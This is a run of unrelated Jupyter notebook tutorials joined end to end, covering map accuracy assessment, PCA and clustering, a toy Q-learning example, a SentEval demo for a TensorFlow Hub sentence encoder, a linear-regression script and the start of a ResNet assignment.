confusion_matrix.to_csv('../Results/WOfS_Assessment/Point_Based/ConfusionMatrix/Western_WetSeason_confusion_matrix.csv')
```
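The same producer's, user's, and overall accuracies can be cross-checked with scikit-learn. This is a minimal sketch on illustrative labels, not the validation data above; the `metrics` module is used so the `confusion_matrix` DataFrame built earlier is not shadowed.

```python
# Cross-check of the same metrics with scikit-learn; the labels below are
# illustrative, not the validation data used above.
import numpy as np
from sklearn import metrics

actual = np.array([0, 0, 1, 1, 1, 0, 1, 0])       # 0 = NoWater, 1 = Water
predicted = np.array([0, 1, 1, 1, 0, 0, 1, 0])

cm = metrics.confusion_matrix(actual, predicted)   # rows = actual, cols = predicted
producers = np.diag(cm) / cm.sum(axis=1) * 100     # per-class recall (map-maker)
users = np.diag(cm) / cm.sum(axis=0) * 100         # per-class precision (map-user)

print("Producer's accuracy per class:", producers)
print("User's accuracy per class:", users)
print("Overall accuracy:", metrics.accuracy_score(actual, predicted) * 100)
print("F1 score (Water class):", metrics.f1_score(actual, predicted))
```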
***
## Additional information
**License:** The code in this notebook is licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0).
Digital Earth Africa data is licensed under the [Creative Commons by Attribution 4.0](https://creativecommons.org/licenses/by/4.0/) license.
**Contact:** If you need assistance, please post a question on the [Open Data Cube Slack channel](http://slack.opendatacube.org/) or on the [GIS Stack Exchange](https://gis.stackexchange.com/questions/ask?tags=open-data-cube) using the `open-data-cube` tag (you can view previously asked questions [here](https://gis.stackexchange.com/questions/tagged/open-data-cube)).
If you would like to report an issue with this notebook, you can file one on [Github](https://github.com/digitalearthafrica/deafrica-sandbox-notebooks).
**Last modified:** January 2020
**Compatible datacube version:**
## Tags
Browse all available tags on the DE Africa User Guide's [Tags Index](https://) (placeholder as this does not exist yet)
|
github_jupyter
|
## Principal Component Analysis
```
# Import numpy
import numpy as np
# Import linear algebra module
from scipy import linalg as la
# Create dataset
data=np.array([[7., 4., 3.],
[4., 1., 8.],
[6., 3., 5.],
[8., 6., 1.],
[8., 5., 7.],
[7., 2., 9.],
[5., 3., 3.],
[9., 5., 8.],
[7., 4., 5.],
[8., 2., 2.]])
# 1. Calculate the covariance matrix
# Center your data
data -= data.mean(axis=0)
cov = np.cov(data, rowvar=False)
# 2. Calculate the eigenvalues and eigenvectors of the covariance matrix
evals, evecs = la.eig(cov)
evals = evals.real  # a covariance matrix is symmetric, so its eigenvalues are real
print("Eigenvalues:", evals)
print("Eigenvectors:", evecs)
# 3. Multiply the original data matrix with Eigenvector matrix.
# Sort the eigenvalues and eigenvectors and select components
num_components=2
sorted_key = np.argsort(evals)[::-1][:num_components]
evals, evecs = evals[sorted_key], evecs[:, sorted_key]
print("Sorted and Selected Eigen Values:", evals)
print("Sorted and Selected Eigen Vector:", evecs)
# Multiply original data and Eigen vector
principal_components=np.dot(data,evecs)
print("Principal Components:", principal_components)
# Import pandas and PCA
import pandas as pd
# Import principal component analysis
from sklearn.decomposition import PCA
# Create dataset
data=np.array([[7., 4., 3.],
[4., 1., 8.],
[6., 3., 5.],
[8., 6., 1.],
[8., 5., 7.],
[7., 2., 9.],
[5., 3., 3.],
[9., 5., 8.],
[7., 4., 5.],
[8., 2., 2.]])
# Create and fit PCA Model
pca_model = PCA(n_components=2)
components = pca_model.fit_transform(data)
components_df = pd.DataFrame(data = components,
columns = ['principal_component_1', 'principal_component_2'])
print(components_df)
```
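The eigenvalues computed above also tell how much of the total variance each component captures: each eigenvalue divided by the sum of all eigenvalues is that component's share. A small sketch on the same toy dataset, using the sklearn attribute `explained_variance_ratio_` that exposes this quantity:

```python
# The fraction of total variance captured by each principal component
# equals its eigenvalue divided by the sum of all eigenvalues; sklearn
# exposes this directly as explained_variance_ratio_.
import numpy as np
from sklearn.decomposition import PCA

data = np.array([[7., 4., 3.], [4., 1., 8.], [6., 3., 5.], [8., 6., 1.],
                 [8., 5., 7.], [7., 2., 9.], [5., 3., 3.], [9., 5., 8.],
                 [7., 4., 5.], [8., 2., 2.]])

pca_model = PCA(n_components=2).fit(data)
print("Explained variance ratio:", pca_model.explained_variance_ratio_)
print("Total variance kept:", pca_model.explained_variance_ratio_.sum())
```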
## Finding Number of Clusters
### The Elbow Method
```
# import pandas
import pandas as pd
# import matplotlib
import matplotlib.pyplot as plt
# import K-means
from sklearn.cluster import KMeans
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
wcss_list = []
# Run a loop for different value of number of cluster
for i in range(1, 6):
# Create and fit the KMeans model
kmeans_model = KMeans(n_clusters = i, random_state = 123)
kmeans_model.fit(data)
    # Add the WCSS (inertia) of the clusters to wcss_list
wcss_list.append(kmeans_model.inertia_)
# Plot the inertia(WCSS) and number of clusters
plt.plot(range(1, 6), wcss_list, marker='*')
# set title of the plot
plt.title('Selecting Optimum Number of Clusters using Elbow Method')
# Set x-axis label
plt.xlabel('Number of Clusters K')
# Set y-axis label
plt.ylabel('Within-Cluster Sum of the Squares(Inertia)')
# Display plot
plt.show()
```
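Reading the elbow off the plot by eye can also be automated with a simple heuristic: the elbow is roughly where the WCSS curve bends most sharply, i.e. where its second difference is largest. A hedged sketch with illustrative WCSS values (not the output of the loop above):

```python
# Simple elbow heuristic: pick the k where the second difference of the
# WCSS curve is largest, i.e. where the curve bends most sharply.
import numpy as np

# Illustrative WCSS values for k = 1..5
wcss = np.array([420.0, 120.0, 80.0, 60.0, 50.0])
second_diff = np.diff(wcss, n=2)       # one value per interior k
elbow_k = np.argmax(second_diff) + 2   # +2 maps the index back to k (k starts at 1)
print("Suggested number of clusters:", elbow_k)  # -> 2 for these values
```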
### Silhouette Method
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# import k-means for performing clustering
from sklearn.cluster import KMeans
# import silhouette score
from sklearn.metrics import silhouette_score
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
score_list = []
# Run a loop for different value of number of cluster
for i in range(2, 6):
# Create and fit the KMeans model
kmeans_model = KMeans(n_clusters = i, random_state = 123)
kmeans_model.fit(data)
# Make predictions
pred=kmeans_model.predict(data)
# Calculate the Silhouette Score
score = silhouette_score (data, pred, metric='euclidean')
# Add the Silhouette score of the clusters to the score_list
score_list.append(score)
# Plot the Silhouette score and number of cluster
plt.bar(range(2, 6), score_list)
# Set title of the plot
plt.title('Silhouette Score Plot')
# Set x-axis label
plt.xlabel('Number of Clusters K')
# Set y-axis label
plt.ylabel('Silhouette Scores')
# Display plot
plt.show()
```
## K-Means Clustering
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import K-means
from sklearn.cluster import KMeans
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
# Define number of clusters
num_clusters = 2
# Create and fit the KMeans model
km = KMeans(n_clusters=num_clusters)
km.fit(data)
# Predict the target variable
pred=km.predict(data)
# Plot the Clusters
plt.scatter(data.X,data.Y,c=pred, marker="o", cmap="bwr_r")
# Set title of the plot
plt.title('K-Means Clustering')
# Set x-axis label
plt.xlabel('X-Axis Values')
# Set y-axis label
plt.ylabel('Y-Axis Values')
# Display the plot
plt.show()
```
## Hierarchical Clustering
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import dendrogram
from scipy.cluster.hierarchy import dendrogram
from scipy.cluster.hierarchy import linkage
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
# create dendrogram using ward linkage
dendrogram_plot = dendrogram(linkage(data, method = 'ward'))
# Set title of the plot
plt.title('Hierarchical Clustering: Dendrogram')
# Set x-axis label
plt.xlabel('Data Items')
# Set y-axis label
plt.ylabel('Distance')
# Display the plot
plt.show()
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import Agglomerative Clustering
from sklearn.cluster import AgglomerativeClustering
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
# Specify number of clusters
num_clusters = 2
# Create agglomerative clustering model
ac = AgglomerativeClustering(n_clusters = num_clusters, linkage='ward')
# Fit the Agglomerative Clustering model
ac.fit(data)
# Predict the target variable
pred=ac.labels_
# Plot the Clusters
plt.scatter(data.X,data.Y,c=pred, marker="o")
# Set title of the plot
plt.title('Agglomerative Clustering')
# Set x-axis label
plt.xlabel('X-Axis Values')
# Set y-axis label
plt.ylabel('Y-Axis Values')
# Display the plot
plt.show()
```
## DBSCAN Clustering
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import DBSCAN clustering model
from sklearn.cluster import DBSCAN
# import make_moons dataset
from sklearn.datasets import make_moons
# Generate some random moon data
features, label = make_moons(n_samples = 2000)
# Create DBSCAN clustering model
db = DBSCAN()
# Fit the DBSCAN model
db.fit(features)
# Predict the target variable
pred_label=db.labels_
# Plot the Clusters
plt.scatter(features[:, 0], features[:, 1], c=pred_label, marker="o",cmap="bwr_r")
# Set title of the plot
plt.title('DBSCAN Clustering')
# Set x-axis label
plt.xlabel('X-Axis Values')
# Set y-axis label
plt.ylabel('Y-Axis Values')
# Display the plot
plt.show()
```
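Unlike K-means, DBSCAN takes no cluster count; the clustering it finds is governed by `eps` (the neighbourhood radius) and `min_samples`. A small sketch that sweeps a few illustrative `eps` values to see how the number of clusters found changes:

```python
# Count the clusters DBSCAN finds for a few eps values; the eps values
# chosen here are illustrative, not tuned.
import numpy as np
from sklearn.cluster import DBSCAN
from sklearn.datasets import make_moons

features, _ = make_moons(n_samples=2000, random_state=42)

for eps in (0.05, 0.1, 0.3):
    labels = DBSCAN(eps=eps, min_samples=5).fit(features).labels_
    n_clusters = len(set(labels)) - (1 if -1 in labels else 0)  # -1 marks noise
    print(f"eps={eps}: {n_clusters} clusters, {np.sum(labels == -1)} noise points")
```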
## Spectral Clustering
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import Spectral Clustering
from sklearn.cluster import SpectralClustering
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
# Specify number of clusters
num_clusters = 2
# Create Spectral Clustering model
sc=SpectralClustering(num_clusters, affinity='rbf', n_init=100, assign_labels='discretize')
# Fit the Spectral Clustering model
sc.fit(data)
# Predict the target variable
pred=sc.labels_
# Plot the Clusters
plt.scatter(data.X,data.Y,c=pred, marker="o")
# Set title of the plot
plt.title('Spectral Clustering')
# Set x-axis label
plt.xlabel('X-Axis Values')
# Set y-axis label
plt.ylabel('Y-Axis Values')
# Display the plot
plt.show()
```
## Cluster Performance Evaluation
```
# Import libraries
import pandas as pd
# read the dataset
diabetes = pd.read_csv("diabetes.csv")
# Show top 5-records
diabetes.head()
# split dataset in two parts: feature set and target label
feature_set = ['pregnant', 'insulin', 'bmi', 'age','glucose','bp','pedigree']
features = diabetes[feature_set]
target = diabetes.label
# partition data into training and testing set
from sklearn.model_selection import train_test_split
feature_train, feature_test, target_train, target_test = train_test_split(features, target, test_size=0.3, random_state=1)
# Import K-means Clustering
from sklearn.cluster import KMeans
# Import metrics module for performance evaluation
from sklearn.metrics import davies_bouldin_score
from sklearn.metrics import silhouette_score
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics import jaccard_score
from sklearn.metrics import f1_score
from sklearn.metrics import fowlkes_mallows_score
# Specify the number of clusters
num_clusters = 2
# Create and fit the KMeans model
km = KMeans(n_clusters=num_clusters)
km.fit(feature_train)
# Predict the target variable
predictions=km.predict(feature_test)
# Calculate internal performance evaluation measures
print("Davies-Bouldin Index:", davies_bouldin_score(feature_test, predictions))
print("Silhouette Coefficient:", silhouette_score(feature_test, predictions))
# Calculate External performance evaluation measures
print("Adjusted Rand Score:", adjusted_rand_score(target_test, predictions))
print("Jaccard Score:", jaccard_score(target_test, predictions))
print("F-Measure(F1-Score):", f1_score(target_test, predictions))
print("Fowlkes Mallows Score:", fowlkes_mallows_score(target_test, predictions))
```
Q-Learning is an important model-free algorithm in reinforcement learning. Its basic idea is to record and update state-action values in a Q-table until a "perfect" Q-table is obtained: whatever state the agent is in, it can look up this table to decide how to act.
The very simple example below illustrates the idea of Q-Learning (this case study mainly follows: https://morvanzhou.github.io/tutorials/ ). The agent lives in a one-dimensional world: it can only move left or right along a line of fixed length, one cell at a time, and it receives a reward of +1 only when it reaches the rightmost cell. Initially the agent sits at the leftmost cell and does not know that there is a "treasure" at the right end that yields the reward.
This article may also be useful as a reference: https://blog.csdn.net/Young_Gy/article/details/73485518
```
import numpy as np
import pandas as pd
import time
```
## Define the System Parameters
```
N_STATES = 6 # the length of the 1 dimensional world
ACTIONS = ['left', 'right'] # available actions
EPSILON = 0.9   # greedy policy: even when the Q-table already holds a (best) Q-value, there is a 10% chance of picking a random action
ALPHA = 0.1 # learning rate
GAMMA = 0.9 # discount factor
MAX_EPISODES = 7 # maximum episodes
FRESH_TIME = 0.01 # fresh time for one move
TERMINAL='bang' # terminal state, set when the agent reaches the treasure at the far right
DEBUG=True      # set to True to print extra information while debugging
```
## Function to Create the Q-table, Initialized to Zero
The Q-table for this example is structured as follows; the leftmost column is the state. There are 6 states, i.e. the agent can move left and right across 6 cells:
| |left|right|
|---|---|---|
|0|0|0|
|1|0|0|
|2|0|0|
|3|0|0|
|4|0|0|
|5|0|0|
```
def build_q_table(n_states, actions):
table = pd.DataFrame(
np.zeros((n_states, len(actions))), # q_table initial values
columns=actions, # actions's name
)
print(table) # show table
return table
```
## The Policy
This is the policy part of reinforcement learning. The policy here is simple: if a uniform random sample is greater than the configured EPSILON, or all action values for the current state are zero, explore by choosing an action at random; otherwise act greedily and take the action with the largest value in the Q-table. The goal is to keep improving the action values stored in the Q-table.
```
def choose_action(state, q_table):
# This is how to choose an action
state_actions = q_table.iloc[state, :]
    # if all action values for the current state are 0, choose an action at random
    # if a uniform random sample > EPSILON, choose an action at random
if (np.random.uniform() > EPSILON) or ((state_actions == 0).all()):
action_name = np.random.choice(ACTIONS)
else: # act greedy
action_name = state_actions.idxmax()
return action_name
```
## Interacting with the Environment
The environment receives the agent's action and executes it, then returns the next state and the corresponding reward. The environment gives a +1 reward only when the agent reaches the rightmost cell; in all other cases reward = 0.
```
def get_env_feedback(S, A):
# This is how agent will interact with the environment
    # S_: next state
# R: reward to action A
if A == 'right': # move right
if S == N_STATES - 2: # terminate
S_ = TERMINAL
R = 1
else:
S_ = S + 1
R = 0
else: # move left
R = 0
if S == 0:
S_ = S # reach the wall
else:
S_ = S - 1
return S_, R
```
## Updating the Environment
This is part of the agent-environment interaction: rendering the environment.
```
def update_env(S, episode, step_counter):
# This is how environment be updated
env_list = ['-']*(N_STATES-1) + ['T'] # '---------T' our environment
if S == TERMINAL:
interaction = 'Episode %s: total_steps = %s' % (episode+1, step_counter)
print('\r{}'.format(interaction), end='')
time.sleep(2)
print('\r ', end='')
else:
env_list[S] = 'o'
interaction = ''.join(env_list)
print('\r{}'.format(interaction), end='')
time.sleep(FRESH_TIME)
```
## Implementing the Game
rl = reinforcement learning
Two concepts are worth distinguishing here:
* q_predict, the Q estimate: the current value of (S, A) in the Q-table (the "Q-value" for short), expressing how valuable action A is in state S. It is the Q-value before the environment has received and executed action A, so it is a prediction; equivalently, it is the "Q truth" left over from the previous visit to (S, A), if there was one.
* q_target, the Q "truth": the Q-value of (S, A) after execution. The environment receives and executes action A and returns S_ (the next state) and R (the reward); q_target is then computed with the Q-Learning update rule, q_target = R + GAMMA * max_a Q(S_, a). It is called the "truth" because at this point action A has actually been executed by the environment, so this Q-value reflects what really happened.
The following figure illustrates the Q-Learning algorithm (see: https://www.cse.unsw.edu.au/~cs9417ml/RL1/algorithms.html ):

```
def rl():
# main part of RL loop
q_table = build_q_table(N_STATES, ACTIONS)
for episode in range(MAX_EPISODES):
step_counter = 0
S = 0
is_terminated = False
update_env(S, episode, step_counter)
while not is_terminated:
A = choose_action(S, q_table)
            # The value of the current (S, A) in the Q-table is called the Q estimate, i.e. the current value of the (S, A) pair.
q_predict = q_table.loc[S, A]
S_, R = get_env_feedback(S, A) # take action & get next state and reward
if S_ != TERMINAL:
q_target = R + GAMMA * q_table.iloc[S_, :].max() # next state is not terminal
else:
q_target = R # next state is terminal
is_terminated = True # terminate this episode
q_table.loc[S, A] = q_predict + ALPHA * (q_target - q_predict) # update
if DEBUG == True and q_target != q_predict:
print(' %s episode,S(%s),A(%s),R(%.6f),S_(%s),q_p(%.6f),q_t(%.6f),q_tab[S,A](%.6f)' % (episode,S,A,R,S_,q_predict,q_target,q_table.loc[S,A]))
#print(q_table)
S = S_ # move to next state
update_env(S, episode, step_counter+1)
step_counter += 1
return q_table
```
## Run the Reinforcement Learning Training
Unfortunately, I have not yet found a way to keep refreshing the training progress on a single line in Jupyter; suggestions are welcome. For now, you can watch the agent train by switching DEBUG on.
```
q_table = rl()
print('\r\nQ-table after training:\n')
print(q_table)
```
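Once training has converged, the greedy policy can be read straight off the Q-table: for each state, take the action whose column holds the largest value. A minimal sketch with illustrative Q-values (not the actual output of `rl()`):

```python
# Read the greedy policy off a trained Q-table: per state, pick the
# action with the largest value. These numbers are illustrative only.
import pandas as pd

q_table = pd.DataFrame(
    {'left':  [0.0,   0.0,   0.004, 0.0,   0.0,   0.0],
     'right': [0.004, 0.025, 0.111, 0.368, 0.745, 0.0]})

policy = q_table.idxmax(axis=1)  # best action per state (ties pick the first column)
print(policy)
```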
**Copyright 2021 The TensorFlow Hub Authors.**
Licensed under the Apache License, Version 2.0 (the "License");
```
# Copyright 2021 The TensorFlow Hub Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
```
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/hub/blob/master/examples/colab/senteval_for_universal_sentence_encoder_cmlm.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/hub/blob/master/examples/colab/senteval_for_universal_sentence_encoder_cmlm.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View on GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/hub/examples/colab/senteval_for_universal_sentence_encoder_cmlm.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
<td>
<a href="https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1"><img src="https://www.tensorflow.org/images/hub_logo_32px.png" />See TF Hub model</a>
</td>
</table>
# Universal Sentence Encoder SentEval demo
This colab demonstrates the [Universal Sentence Encoder CMLM model](https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1) using the [SentEval](https://github.com/facebookresearch/SentEval) toolkit, a library for measuring the quality of sentence embeddings. The SentEval toolkit includes a diverse set of downstream tasks that evaluate the generalization power of an embedding model and the linguistic properties it encodes.
Run the first two code blocks to set up the environment; in the third code block you can pick a SentEval task to evaluate the model. A GPU runtime is recommended for this Colab.
To learn more about the Universal Sentence Encoder CMLM model, see https://openreview.net/forum?id=WDVD4lUCTzU.
```
#@title Install dependencies
!pip install --quiet tensorflow_text==2.7.3
!pip install --quiet torch==1.8.1
```
## Download SentEval and task data
This step downloads SentEval from GitHub and executes the data script to download the task data. It may take up to 5 minutes to complete.
```
#@title Install SentEval and download task data
!rm -rf ./SentEval
!git clone https://github.com/facebookresearch/SentEval.git
!cd $PWD/SentEval/data/downstream && bash get_transfer_data.bash > /dev/null 2>&1
```
# Execute a SentEval evaluation task
The following code block executes a SentEval task and outputs the results. Choose one of the following tasks to evaluate the USE CMLM model:
```
MR CR SUBJ MPQA SST TREC MRPC SICK-E
```
Select a model, params and task to run. The rapid prototyping params reduce computation time for a faster result.
It typically takes 5-15 minutes to complete a task with the **'rapid prototyping'** params and up to an hour with the **'slower, best performance'** params.
```
params = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 5}
params['classifier'] = {'nhid': 0, 'optim': 'rmsprop', 'batch_size': 128,
'tenacity': 3, 'epoch_size': 2}
```
For better results, use the **'slower, best performance'** params; computation may take up to 1 hour:
```
params = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 10}
params['classifier'] = {'nhid': 0, 'optim': 'adam', 'batch_size': 16,
'tenacity': 5, 'epoch_size': 6}
```
```
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import sys
sys.path.append(f'{os.getcwd()}/SentEval')
import tensorflow as tf
# Prevent TF from claiming all GPU memory so there is some left for pytorch.
gpus = tf.config.list_physical_devices('GPU')
if gpus:
# Memory growth needs to be the same across GPUs.
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
import tensorflow_hub as hub
import tensorflow_text
import senteval
import time
PATH_TO_DATA = f'{os.getcwd()}/SentEval/data'
MODEL = 'https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1' #@param ['https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1', 'https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-large/1']
PARAMS = 'rapid prototyping' #@param ['slower, best performance', 'rapid prototyping']
TASK = 'CR' #@param ['CR','MR', 'MPQA', 'MRPC', 'SICKEntailment', 'SNLI', 'SST2', 'SUBJ', 'TREC']
params_prototyping = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 5}
params_prototyping['classifier'] = {'nhid': 0, 'optim': 'rmsprop', 'batch_size': 128,
'tenacity': 3, 'epoch_size': 2}
params_best = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 10}
params_best['classifier'] = {'nhid': 0, 'optim': 'adam', 'batch_size': 16,
'tenacity': 5, 'epoch_size': 6}
params = params_best if PARAMS == 'slower, best performance' else params_prototyping
preprocessor = hub.KerasLayer(
"https://tfhub.dev/tensorflow/bert_en_uncased_preprocess/3")
encoder = hub.KerasLayer(
"https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1")
inputs = tf.keras.Input(shape=tf.shape(''), dtype=tf.string)
outputs = encoder(preprocessor(inputs))
model = tf.keras.Model(inputs=inputs, outputs=outputs)
def prepare(params, samples):
return
def batcher(_, batch):
batch = [' '.join(sent) if sent else '.' for sent in batch]
return model.predict(tf.constant(batch))["default"]
se = senteval.engine.SE(params, batcher, prepare)
print("Evaluating task %s with %s parameters" % (TASK, PARAMS))
start = time.time()
results = se.eval(TASK)
end = time.time()
print('Time took on task %s : %.1f. seconds' % (TASK, end - start))
print(results)
```
# Learn More
* Find more text embedding models on [TensorFlow Hub](https://tfhub.dev)
* See also the [Multilingual Universal Sentence Encoder CMLM model](https://tfhub.dev/google/universal-sentence-encoder-cmlm/multilingual-base-br/1)
* Check out other [Universal Sentence Encoder models](https://tfhub.dev/google/collections/universal-sentence-encoder/1)
## Reference
* Ziyi Yang, Yinfei Yang, Daniel Cer, Jax Law, Eric Darve. [Universal Sentence Representations Learning with Conditional Masked Language Model. November 2020](https://openreview.net/forum?id=WDVD4lUCTzU)
```
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
from sklearn import preprocessing
# Try to find value for W and b to compute y_data = x_data * W + b
# Define dimensions
d = 2 # Size of the parameter space
N = 50 # Number of data sample
# Model parameters
W = tf.Variable(tf.zeros([d, 1], tf.float32), name="weights")
b = tf.Variable(tf.zeros([1], tf.float32), name="biases")
# Model input and output
x = tf.placeholder(tf.float32, shape=[None, d])
y = tf.placeholder(tf.float32, shape=[None, 1])
# hypothesis
linear_regression_model = tf.add(tf.matmul(x, W), b)
# cost/loss function
loss = tf.reduce_mean(tf.square(linear_regression_model - y)) / 2
# optimizer
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.00015)
train = optimizer.minimize(loss)
# Load the training and test sets
training_filename = "dataForTraining.txt"
testing_filename = "dataForTesting.txt"
training_dataset = np.loadtxt(training_filename)
testing_dataset = np.loadtxt(testing_filename)
dataset = np.vstack((training_dataset,testing_dataset))
# Keep the parameters (mean, std) fitted on the training set and use the fitted object to transform the test set
# Feature scaling
min_max_scaler = preprocessing.MinMaxScaler()
# Standardization
normal_scaler = preprocessing.StandardScaler().fit(training_dataset)
# Min-max normalization
dataset = min_max_scaler.fit_transform(dataset)
# Standardization
training_dataset = normal_scaler.transform(training_dataset)
testing_dataset = normal_scaler.transform(testing_dataset)
print(np.mean(training_dataset,axis=0))
print(np.std(training_dataset,axis=0))
print(np.mean(testing_dataset,axis=0))
print(np.std(testing_dataset,axis=0))
x_train = np.array(training_dataset[:,:2])
y_train = np.array(training_dataset[:,2:3])
x_test = np.array(testing_dataset[:,:2])
y_test = np.array(testing_dataset[:,2:3])
print("Training data shape:")
print(x_train.shape)
print("Testing data shape:")
print(x_test.shape)
print('')
print("normalized training data:")
print(x_train)
print('')
print("normalized testing data:")
print(x_test)
print('')
mini_batch_size = 1
n_batch = N // mini_batch_size + (N % mini_batch_size != 0)
print(n_batch)
save_step_loss = {"step":[],"train_loss":[],"test_loss":[]} # save the step and loss values for plotting
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init) # reset values to wrong
steps = 1500001
for i in range(steps):
i_batch = (i % n_batch)*mini_batch_size
batch = x_train[i_batch:i_batch+mini_batch_size], y_train[i_batch:i_batch+mini_batch_size]
sess.run(train, {x: batch[0], y:batch[1]})
# random_index = np.random.choice(N)
# sess.run(train, {x: [x_train[random_index]], y:[y_train[random_index]]})
if i % 100000 == 0:
# evaluate training accuracy
print("iteration times: %s" % i)
curr_W, curr_b, curr_train_loss = sess.run([W, b, loss], {x: x_train, y: y_train})
print("W: %s \nb: %s \nTrain Loss: %s" % (curr_W, curr_b, curr_train_loss))
# Accuracy computation
curr_test_loss = sess.run(loss,{x:x_test,y:y_test})
print("Test Loss: %s\n" % curr_test_loss)
save_step_loss["step"].append(i)
save_step_loss["train_loss"].append(curr_train_loss)
save_step_loss["test_loss"].append(curr_test_loss)
#Plot the loss curves
plt.plot(save_step_loss["step"],save_step_loss["train_loss"],label='Training Loss')
plt.plot(save_step_loss["step"],save_step_loss["test_loss"],label='Testing Loss')
plt.xlabel('Iteration times')
plt.ylabel('Loss')
plt.legend()
plt.show()
#Plot the loss curves, skipping the first point
plt.plot(save_step_loss["step"][1:],save_step_loss["train_loss"][1:],label='Training Loss')
plt.plot(save_step_loss["step"][1:],save_step_loss["test_loss"][1:],label='Testing Loss')
plt.xlabel('Iteration times')
plt.ylabel('Loss')
plt.legend()
plt.show()
#Plot the loss curves, skipping the first three points
plt.plot(save_step_loss["step"][3:],save_step_loss["train_loss"][3:],label='Training Loss')
plt.plot(save_step_loss["step"][3:],save_step_loss["test_loss"][3:],label='Testing Loss')
plt.xlabel('Iteration times')
plt.ylabel('Loss')
plt.legend()
plt.show()
#Plot the loss curves, skipping the first five points
plt.plot(save_step_loss["step"][5:],save_step_loss["train_loss"][5:],label='Training Loss')
plt.plot(save_step_loss["step"][5:],save_step_loss["test_loss"][5:],label='Testing Loss')
plt.xlabel('Iteration times')
plt.ylabel('Loss')
plt.legend()
plt.show()
print('Train Loss:\n',save_step_loss["train_loss"])
print('')
print('Test Loss:\n',save_step_loss["test_loss"])
```
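As a sanity check on the gradient-descent fit, the same linear model also has a closed-form least-squares solution. A minimal NumPy sketch on synthetic data (the `dataForTraining.txt` file is not assumed here):

```python
# Closed-form least squares as a sanity check on gradient descent:
# solve min ||X_aug w - y||^2 with a column of ones appended for the bias.
# Synthetic data stands in for the housing dataset used above.
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(50, 2))
true_w, true_b = np.array([2.0, -3.0]), 1.5
y = X @ true_w + true_b + 0.01 * rng.normal(size=50)

X_aug = np.hstack([X, np.ones((50, 1))])          # append bias column
w_hat = np.linalg.lstsq(X_aug, y, rcond=None)[0]  # least-squares solution
print("Estimated [W1, W2, b]:", w_hat)            # close to [2, -3, 1.5]
```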
# Residual Networks
Welcome to the second assignment of this week! You will learn how to build very deep convolutional networks, using Residual Networks (ResNets). In theory, very deep networks can represent very complex functions; but in practice, they are hard to train. Residual Networks, introduced by [He et al.](https://arxiv.org/pdf/1512.03385.pdf), allow you to train much deeper networks than were previously practically feasible.
**In this assignment, you will:**
- Implement the basic building blocks of ResNets.
- Put together these building blocks to implement and train a state-of-the-art neural network for image classification.
## <font color='darkblue'>Updates</font>
#### If you were working on the notebook before this update...
* The current notebook is version "2a".
* You can find your original work saved in the notebook with the previous version name ("v2")
* To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#### List of updates
* For testing on an image, replaced `preprocess_input(x)` with `x=x/255.0` to normalize the input image in the same way that the model's training data was normalized.
* Refers to "shallower" layers as those layers closer to the input, and "deeper" layers as those closer to the output (Using "shallower" layers instead of "lower" or "earlier").
* Added/updated instructions.
This assignment will be done in Keras.
Before jumping into the problem, let's run the cell below to load the required packages.
```
import numpy as np
from keras import layers
